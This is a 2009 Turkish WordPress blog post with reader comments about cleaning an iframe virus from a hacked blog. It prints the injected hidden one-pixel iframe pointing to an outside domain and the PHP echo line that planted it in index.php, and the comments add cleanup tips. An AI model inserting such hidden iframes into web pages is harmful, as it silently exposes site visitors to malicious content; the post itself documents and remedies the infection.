Haziran 3rd, 2009 | Ali BARIN | Gerekliler, Wordpress | 5 Yorum |

Bugün Sinan Yorulmaz kardeşimin uyarısı ile blogda virüs olduğunun farkına vardım. Virüs nasıl bulaşmış bilmiyorum fakat sitenin kaynak kodlarına kendini yerleştirmiş. Kapadığımız ‘html’ etiketinin hemen altına bu kodu yerleştirip hem kendisi faydalanmış hemde sitemizin adını ‘kötü içerikli site’ ye çıkartmış.

<iframe src="http://internetcountercheck.com/?click=6073953" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Bende google.com.tr de biraz araştırma yaparak bir, iki sonuca vardım. Kullandığım temanın dosyalarını her ne kadar arasam, tarasamda ‘iframe’ etiketli kodu bulamamıştım. En sonunda wordpress ‘in ‘index.php’ sinde olduğunu farkettim. Kendini dosyaya şu şekilde yerleştirmiş ve her sayfada çıkmayı sağlamış.

echo "<iframe src=\"http://internetcountercheck.com/?click=6073953\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Bir, iki yararlı dökümantasyon:
Malicious ‘Income’ IFrames from .CN Domains
Gogo2me – Hidden IFrame Injection
Another Type of IFrame Hack (PHP Exploit)

   Sitede ki iFrame Virüsleri adlı yazıda 5 yorum var

Saol işe yarayacak bilgiler.

Aynı şekilde başka bir iframe virüsü var. Aşağıdaki bağlantı hakkında bilgi ve çözümünü öğrenebilirsiniz.
http://www.zoque.net/www/31318-bu-virus-hostingi-altust-etti/

bilgisayarınıza bulaşan virüs kullandığınız ftp programının kayıtlarını alıyor, genel olarak bulaşma sistemi budur. tüm alt klasörlerdeki index.php dosyalarına ve wp için sölüyorum includes/default-filters.php dosyasına bakın genelde oraya atar kodları. bir de ftp şifrenizi değiştirin bidaha başınıza gelmesin :)

Merhabalar peki bu ref domainlerle alakası varmı…Ya googlede indexlenen bi kaç tane ref domain var.Onlardan nasıl kurtulcaz.Bu virüslerin onlarla bi ilgisi varmı.Teşekkürler iyi calısmalar.

olcay
Temmuz 24th, 2009 » 16:27

Yorumlarınız gerçekten güzel. Fakat size tavsiyem ilk önce temiz bir PC ki bu virüsü temizlemek o kadar kolay değil. Kullandığımız anti virüs programları dosya koruma bazında olduğundan dolayı bazı kısımları atlıyor ve görmüyor. Bu sistemde bulunan virüslerin tam yapıları şu şekild bredolap.aa veya rustock.nim şeklinde geliyor diğer adları botnetlog.11 ve agentbot ki bu dosylar temp dosyları sistem32 içerisinde dirvers klasörünün içindeki bölümleri işgal ediyorlar. Kendilerini başka partitionlara, yani hdd nin başka bölümlerinde kopyaladıkları içinde görülmüyor veya anti virüs programları ile tespitide mümkün olmuyor. Bunun için luncher özelliği olan bi virüs temizleyici ile temizlemeniz gerek. Dr. Web ( ftp://ftp.drweb.com/pub/drweb/cureit/launch.exe )kullanmanızı önerebilirim. Ücretsiz bir yazılım sizide fazla uğraştırmayacaktır. İndirin ve temizleyin cinsinde birşey. Temizlikten sonra virüsten etkilenmişenizki öle olacak windowsunuz düzgün çalışmayacak ve hatta çökebilir de. Zaten windowsunuzu yeniden kurmanızı tavsiye ederim.

   Yorum yazın.